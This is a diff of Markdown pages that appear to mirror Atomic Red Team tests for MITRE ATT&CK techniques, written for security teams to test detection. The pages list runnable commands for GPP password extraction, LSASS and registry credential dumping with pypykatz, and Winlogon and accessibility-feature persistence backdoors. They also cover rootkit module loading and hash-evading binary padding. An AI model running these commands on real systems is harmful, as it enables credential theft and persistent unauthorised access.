##### Get Prereq Commands: + ```cmd mkdir #{extract_path} ``` - - -

## Atomic Test #13 - GPP Passwords (findstr) -Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -**Supported Platforms:** Windows +Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be +decrypted with gpp-decrypt on Kali Linux. +**Supported Platforms:** Windows - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd findstr /S cpassword %logonserver%\sysvol\*.xml ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -

## Atomic Test #14 - GPP Passwords (Get-GPPPassword) + Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. -Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". +Successful test execution will either display the credentials found in the GPP files or indicate "No preference files +found". **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1| | gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell . #{gpp_script_path} Get-GPPPassword -Verbose ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} + ##### Check Prereq Commands: + ```powershell if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` + ##### Get Prereq Commands: + ```powershell New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ``` + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -

## Atomic Test #15 - LSASS read with pypykatz + Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. - **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pypykatz live lsa ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must have python 3 installed + ##### Check Prereq Commands: + ```powershell if (python --version) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "Python 3 must be installed manually" ``` + ##### Description: Computer must have pip installed + ##### Check Prereq Commands: + ```powershell if (pip3 -V) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "PIP must be installed manually" ``` + ##### Description: pypykatz must be installed and part of PATH + ##### Check Prereq Commands: + ```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell pip3 install pypykatz ``` - - -

## Atomic Test #16 - Registry parse with pypykatz + Parses registry hives to obtain stored credentials **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pypykatz live registry ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must have python 3 installed + ##### Check Prereq Commands: + ```powershell if (python --version) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "Python 3 must be installed manually" ``` + ##### Description: Computer must have pip installed + ##### Check Prereq Commands: + ```powershell if (pip3 -V) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "PIP must be installed manually" ``` + ##### Description: pypykatz must be installed and part of PATH + ##### Check Prereq Commands: + ```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell pip3 install pypykatz ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1004.md b/Atomic_Threat_Coverage/Triggers/T1004.md index 27df95f3..a8876594 100644 --- a/Atomic_Threat_Coverage/Triggers/T1004.md +++ b/Atomic_Threat_Coverage/Triggers/T1004.md @@ -1,14 +1,19 @@ # T1004 - Winlogon Helper DLL + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004) +
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) -Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) +Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. +Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg +Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on -Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.
+Adversaries may take advantage of these features to repeatedly execute malicious code and establish +Persistence. ## Atomic Tests @@ -18,97 +23,82 @@ Adversaries may take advantage of these features to repeatedly execute malicious - [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell) -
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. -Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. +Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon +logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force @@ -116,12 +106,9 @@ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\No ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1005.md b/Atomic_Threat_Coverage/Triggers/T1005.md index 82b5e651..c7750a8b 100644 --- a/Atomic_Threat_Coverage/Triggers/T1005.md +++ b/Atomic_Threat_Coverage/Triggers/T1005.md @@ -1,44 +1,42 @@ # T1005 - Data from Local System + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005) +
Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. -Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. +Adversaries will often search the file system on computers they have compromised to find files of interest. They may do +this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such +as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather +information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the +local system.
## Atomic Tests - [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies) -
## Atomic Test #1 - Search macOS Safari Cookies -This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. + +This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner +malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. **Supported Platforms:** macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1007.md b/Atomic_Threat_Coverage/Triggers/T1007.md index 0655cf80..a61f701d 100644 --- a/Atomic_Threat_Coverage/Triggers/T1007.md +++ b/Atomic_Threat_Coverage/Triggers/T1007.md @@ -1,5 +1,7 @@ # T1007 - System Service Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007) +
Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
## Atomic Tests @@ -8,22 +10,17 @@ - [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe) -
## Atomic Test #1 - System Service Discovery + Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd tasklist.exe @@ -31,44 +28,35 @@ sc query sc query state= all ``` - - - - -

## Atomic Test #2 - System Service Discovery - net.exe -Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. - -Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s - -**Supported Platforms:** Windows +Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple +threat actors. +Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c: +\Windows\Temp\service-list.txt.s +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net.exe start >> #{output_file} ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file} >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1009.md b/Atomic_Threat_Coverage/Triggers/T1009.md index 35b1f67c..83aa7ea9 100644 --- a/Atomic_Threat_Coverage/Triggers/T1009.md +++ b/Atomic_Threat_Coverage/Triggers/T1009.md @@ -1,43 +1,42 @@ # T1009 - Binary Padding + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009) +
Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. -Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) +Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and +static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create +junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April +2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not +designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public +file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: +VirusTotal FAQ)
## Atomic Tests - [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd) -
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd + Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1010.md b/Atomic_Threat_Coverage/Triggers/T1010.md index 4e4ac075..c2943912 100644 --- a/Atomic_Threat_Coverage/Triggers/T1010.md +++ b/Atomic_Threat_Coverage/Triggers/T1010.md @@ -1,35 +1,35 @@ # T1010 - Application Window Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010) +
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. -In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.
+In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) +script. ## Atomic Tests - [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net) -
## Atomic Test #1 - List Process Main Windows - C# .NET + Compiles and executes C# code to list main window titles associated with each process. -Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. +Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and +execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | $env:TEMP\T1010.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} @@ -37,25 +37,26 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} # ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1012.md b/Atomic_Threat_Coverage/Triggers/T1012.md index e9a5b9fe..c9b1f9ed 100644 --- a/Atomic_Threat_Coverage/Triggers/T1012.md +++ b/Atomic_Threat_Coverage/Triggers/T1012.md @@ -1,20 +1,27 @@ # T1012 - Query Registry + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012) +
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. -The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+The Registry contains a significant amount of information about the operating system, configuration, software, and +security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation +within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) +during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target +and/or attempts specific actions. ## Atomic Tests - [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry) -
## Atomic Test #1 - Query Registry + Query Windows Registry. -Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). +Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent +upon OS). References: @@ -28,12 +35,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" @@ -57,9 +59,4 @@ reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1014.md b/Atomic_Threat_Coverage/Triggers/T1014.md index 24e7127b..c4dfbc17 100644 --- a/Atomic_Threat_Coverage/Triggers/T1014.md +++ b/Atomic_Threat_Coverage/Triggers/T1014.md @@ -1,8 +1,12 @@ # T1014 - Rootkit + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014) +
Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit) -Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
+Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other +system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux +Rootkit) (Citation: BlackHat Mac OSX Rootkit) ## Atomic Tests @@ -12,68 +16,52 @@ Adversaries may use rootkits to hide the presence of programs, files, network co - [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test) -
## Atomic Test #1 - Loadable Kernel Module based Rootkit + Loadable Kernel Module based Rootkit **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo insmod #{rootkit_file} ``` - - - - -

## Atomic Test #2 - Loadable Kernel Module based Rootkit + Loadable Kernel Module based Rootkit **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo modprobe #{rootkit_file} ``` - - - - -

## Atomic Test #3 - Windows Signed Driver Rootkit Test + This test exploits a signed driver to execute code in Kernel. SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: @@ -85,25 +73,16 @@ It would be wise if you only run this in a test environment **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd puppetstrings #{driver_path} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1015.md b/Atomic_Threat_Coverage/Triggers/T1015.md index 95fc877b..4cd79836 100644 --- a/Atomic_Threat_Coverage/Triggers/T1015.md +++ b/Atomic_Threat_Coverage/Triggers/T1015.md @@ -1,14 +1,31 @@ # T1015 - Accessibility Features -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015) -
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - -Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) -Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015) -For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) +
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. -For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) +Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed +five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. +The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access +through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + +Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code +integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, +the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection ( +WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because +it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: + +For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the +program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that +provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at +the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the +replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + +For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key +may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the +accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at +the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with +SYSTEM privileges. (Citation: Tilbury 2014) Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys) @@ -22,28 +39,25 @@ Other accessibility features exist that may also be leveraged in a similar fashi - [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes) -
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes -Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. + +Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of +executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe| | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $input_table = "#{parent_list}".split(",") @@ -65,6 +79,7 @@ Foreach ($item in $input_table){ ``` #### Cleanup Commands: + ```powershell $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) @@ -74,8 +89,4 @@ Foreach ($item in $input_table) } ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1016.md b/Atomic_Threat_Coverage/Triggers/T1016.md index 5fd7d098..0e21076e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1016.md +++ b/Atomic_Threat_Coverage/Triggers/T1016.md @@ -1,8 +1,13 @@ # T1016 - System Network Configuration Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016) +
Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). -Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may use the information +from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to +shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific +actions.
## Atomic Tests @@ -16,22 +21,18 @@ Adversaries may use the information from [System Network Configuration Discovery - [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports) -
## Atomic Test #1 - System Network Configuration Discovery + Identify network configuration information -Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. +Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be +via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd ipconfig /all @@ -41,53 +42,35 @@ nbtstat -n net config ``` - - - - -

## Atomic Test #2 - List Windows Firewall Rules + Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netsh advfirewall firewall show rule name=all ``` - - - - -

## Atomic Test #3 - System Network Configuration Discovery + Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh arp -a @@ -95,27 +78,20 @@ netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig ``` - - - - -

